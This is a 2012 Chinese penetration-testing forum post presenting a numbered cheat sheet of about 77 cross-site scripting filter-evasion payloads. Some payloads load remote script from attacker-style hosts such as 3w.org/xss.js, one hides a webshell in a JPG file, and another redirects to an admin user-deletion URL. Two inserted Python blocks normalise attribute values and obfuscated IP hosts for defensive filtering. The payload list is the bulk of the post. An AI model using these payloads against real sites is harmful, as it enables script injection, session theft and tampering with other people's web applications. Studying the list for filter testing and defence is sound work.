中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Detailed XSS Exploitation Compendium, Part 1

Author: admin    Posted: 2012-9-13 17:04

Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Add the code to the first line of the trojan (webshell), change the trojan to JPG image format, and when the image-format trojan is accessed, our trojan will still be executed.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required; the character references appear decoded here)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed (defective) IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab splitting the JavaScript (the tab is rendered as a space below)
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab splitting the JavaScript (shown decoded)
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless domestically because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape filter
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">
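
Items (3) to (14), (17), (19) and (47) above all defeat the same kind of filter: one that looks for the literal string javascript: in an attribute value, while the browser first decodes character references and then drops whitespace and control characters before it reads the scheme. The Python below is an added example, not code from the original post or from the cheat sheet it draws on; it applies those same decoding steps on the server side before the scheme check, which is the normalisation a sanitizer or a log-review script needs. The function names, the sample values and the exact set of ignored code points are my own assumptions; the ignored set follows the character list in item (47) as I read it.

```python
import html
import re

# Code points a browser drops before it reads the scheme of a URL-valued attribute.
# Assumption for this example, following the list in item (47): C0 controls and
# space (0-32), NBSP (160), the Unicode spaces U+2000..U+200B, ideographic space
# (12288) and the BOM (65279).
IGNORED_CODE_POINTS = (
    set(range(0, 33)) | {160} | set(range(0x2000, 0x200C)) | {0x3000, 0xFEFF}
)

# Schemes the post's vectors rely on: javascript: (most items) and vbscript: (item 40).
SCRIPT_SCHEMES = ("javascript:", "vbscript:")


def normalize_url_attr(value: str) -> str:
    """Undo the encodings the post's vectors use, in the order a browser applies them.

    1. Decode HTML character references once. html.unescape accepts decimal and
       hex numeric references with or without a trailing ';' (items 5, 8-10) and
       with leading zeros (item 9); a single pass means '&#38;#106;' stays '&#106;'
       rather than turning into 'j', which matches browser behaviour.
    2. Drop the whitespace and control characters that are ignored inside the
       scheme (tab/newline/CR in items 11-14, NUL in item 17, leading space in 19).
    """
    decoded = html.unescape(value)
    return "".join(ch for ch in decoded if ord(ch) not in IGNORED_CODE_POINTS)


def is_script_url(value: str) -> bool:
    """True if the attribute value resolves to a script scheme after normalisation.

    The comparison is case-insensitive (item 4).
    """
    return normalize_url_attr(value).lower().startswith(SCRIPT_SCHEMES)


def audit(values):
    """Return (raw, normalised, verdict) for each sample value."""
    return [(v, normalize_url_attr(v), is_script_url(v)) for v in values]


# Constructed sample attribute values modelled on the post's items (not taken from a live site).
SAMPLES = [
    "javascript:alert('XSS')",                                                       # item 3
    "JaVaScRiPt:alert('XSS')",                                                       # item 4
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",    # item 5
    "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",          # item 10
    "jav\tascript:alert('XSS')",                                                     # item 11
    "jav\nascript:alert('XSS')",                                                     # item 13
    "java\x00script:alert('XSS')",                                                   # item 17
    " javascript:alert('XSS')",                                                      # item 19
    "vbscript:msgbox(\"XSS\")",                                                      # item 40
    "http://example.com/?next=javascript:alert(1)",                                  # benign: scheme is http
]

if __name__ == "__main__":
    for raw, norm, verdict in audit(SAMPLES):
        print(f"{'SCRIPT' if verdict else 'ok    '} {raw!r:75} -> {norm!r}")
```

The point of decoding exactly once and then stripping is that the check sees what the browser sees; a filter that strips first and decodes afterwards, or that decodes in a loop, still classifies the samples above differently from the browser.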

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (shown decoded)
<A HREF="http://3w.org">XSS</A>

(70) IP as a single decimal number
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding (the embedded tabs are rendered as spaces below)
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
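
Items (70) to (76) show one host written in forms that a string-based allow list or deny list will not recognise as the same address. The Python below is an added example, not code from the original post; it canonicalises such links the way a resolver does (single-number, hex, octal and mixed-radix dotted hosts, embedded tab/newline removal, trailing-dot names, scheme-relative links) so that an allow list or a log search compares against one spelling. The function names and sample links are mine, and defaulting a scheme-relative link to http: is an assumption made for the example.

```python
import ipaddress
import re
from typing import Optional
from urllib.parse import urlsplit, urlunsplit


def _parse_label(label: str) -> int:
    """Parse one dotted component the way classic inet_aton does:
    0x.. is hex, a leading 0 means octal, anything else is decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", label):
        return int(label[2:], 16)
    if re.fullmatch(r"0[0-7]*", label):
        return int(label, 8)
    if re.fullmatch(r"[1-9][0-9]*", label):
        return int(label, 10)
    raise ValueError(f"not a numeric label: {label!r}")


def numeric_host_to_ipv4(host: str) -> Optional[str]:
    """Return the dotted-quad form of a numeric host, or None if it is not numeric.

    Accepts 1 to 4 components (items 70-73). With fewer than four, the last
    component fills all remaining bytes, so '3232235521' and '192.11010049'
    both mean 192.168.0.1.
    """
    labels = host.split(".")
    if not 1 <= len(labels) <= 4:
        return None
    try:
        values = [_parse_label(label) for label in labels]
    except ValueError:
        return None
    *leading, last = values
    width = 4 - len(leading)  # number of bytes the last component covers
    if any(v > 255 for v in leading) or last >= 256 ** width:
        return None
    n = 0
    for v in leading:
        n = (n << 8) | v
    n = (n << (8 * width)) | last
    return str(ipaddress.IPv4Address(n))


def canonical_host(host: str) -> str:
    """Lower-case the host, drop the trailing dot of an absolute name (item 76)
    and rewrite numeric hosts as dotted quads."""
    host = host.lower().rstrip(".")
    return numeric_host_to_ipv4(host) or host


def canonical_url(url: str, default_scheme: str = "http") -> str:
    """Canonicalise a link as a browser would resolve it.

    Tabs, newlines and carriage returns are removed anywhere in the input
    (item 73); a scheme-relative link (item 74) gets default_scheme, an
    assumption made for this example; an empty path becomes '/'.
    """
    cleaned = re.sub(r"[\t\r\n]", "", url).strip()
    if cleaned.startswith("//"):
        cleaned = f"{default_scheme}:{cleaned}"
    parts = urlsplit(cleaned)
    netloc = canonical_host(parts.hostname or "")
    if parts.port:
        netloc = f"{netloc}:{parts.port}"
    return urlunsplit((parts.scheme.lower(), netloc, parts.path or "/",
                       parts.query, parts.fragment))


# Constructed sample links modelled on items 70-76 (not taken from a live site).
SAMPLES = [
    "http://3232235521",                # item 70, single decimal number
    "http://0xc0.0xa8.0x00.0x01",       # item 71, hex
    "http://0300.0250.0000.0001",       # item 72, octal
    "h\ntt\tp://6\t6.000146.0x7.147/",  # item 73, mixed radix plus embedded tab/newline
    "//www.google.com/",                # item 74, scheme-relative
    "http://www.google.com./",          # item 76, absolute DNS name
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(f"{raw!r:40} -> {canonical_url(raw)}")
```

Run against the samples, the first three links all canonicalise to http://192.168.0.1/ and the mixed-radix one to http://66.102.7.147/, which is why a host comparison has to happen after this step rather than on the raw href string.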

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2